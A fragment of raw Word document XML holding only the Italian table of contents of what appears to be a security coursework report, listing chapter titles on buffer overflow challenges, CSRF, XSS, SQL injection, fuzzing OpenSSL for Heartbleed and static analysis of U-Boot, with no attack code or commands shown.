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kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-169404281"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="64B12DAE" w14:textId="0B0286A7" w:rsidR="00321262" w:rsidRPr="00E55D4B" w:rsidRDefault="00321262" w:rsidP="00A459C6">
          <w:pPr>
            <w:pStyle w:val="Titolosommario"/>
            <w:rPr>
              <w:rFonts w:ascii="Britannic Bold" w:hAnsi="Britannic Bold"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00E55D4B">
            <w:rPr>
              <w:rFonts w:ascii="Britannic Bold" w:hAnsi="Britannic Bold"/>
            </w:rPr>
            <w:t>Sommario</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4F768148" w14:textId="6760A371" w:rsidR="00FA611D" w:rsidRDefault="00321262">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="560"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="008C299B">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="008C299B">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="008C299B">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc140165774" w:history="1">
            <w:r w:rsidR="00FA611D" w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="00FA611D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FA611D" w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Buffer Overflow</w:t>
            </w:r>
            <w:r w:rsidR="00FA611D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FA611D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FA611D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165774 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FA611D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FA611D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA611D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00FA611D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="104A81AC" w14:textId="56361FC3"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75" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1 Fase preliminare</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165775 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="155D6726" w14:textId="5BAC794B"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76" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2 Challenge “put_wisdom”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165776 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B4AD11B" w14:textId="779976B5"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77" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3 Challenge write_secret</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165777 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4044CA68" w14:textId="24357B4B"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78" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4 Challenge “put_wisdom()” nella versione a 32 bit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165778 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A15CA34" w14:textId="3DDE260A"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79" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.5 Array globale</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165779 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20FAFF3D" w14:textId="6FC40659" w:rsidR="00FA611D" w:rsidRDefault="00FA611D">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="560"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc140165780" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Web Security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165780 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="581E9289" w14:textId="45889CAF"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81" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 Cross-Site Request Forgery (CSRF)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165781 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27E887A2" w14:textId="5082ECEF"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82" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 XSS Attacks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165782 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1EA820FA" w14:textId="7CD90888"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83" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3 Self-Propagating XSS Worm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165783 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3305E978" w14:textId="1514C609"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84" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4 SQL Injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165784 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04DA617C" w14:textId="6B06D3E0"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85" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4.1 Attack on UPDATE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165785 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48DA9110" w14:textId="7BCB43FB"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86" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4.2 Prepared Statement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165786 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03FBE370" w14:textId="744C6BB5" w:rsidR="00FA611D" w:rsidRDefault="00FA611D">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc140165787" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. Fuzzing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165787 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7151043F" w14:textId="5DC3D6E3"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88" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 Introduzione protocollo Heartbeat e bug Heartbleed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165788 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C1CC671" w14:textId="6DC28CFD"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89" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 Challenge: Fuzzing OpenSSL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165789 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06F5CA13" w14:textId="0AD2D9F8" w:rsidR="00FA611D" w:rsidRDefault="00FA611D">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc140165790" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4. Static Analysis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165790 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E55F965" w14:textId="4BFCB319"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91" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1 U-Boot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165791 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="634D5DE6" w14:textId="644F33FA"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92" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2 memcpy()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
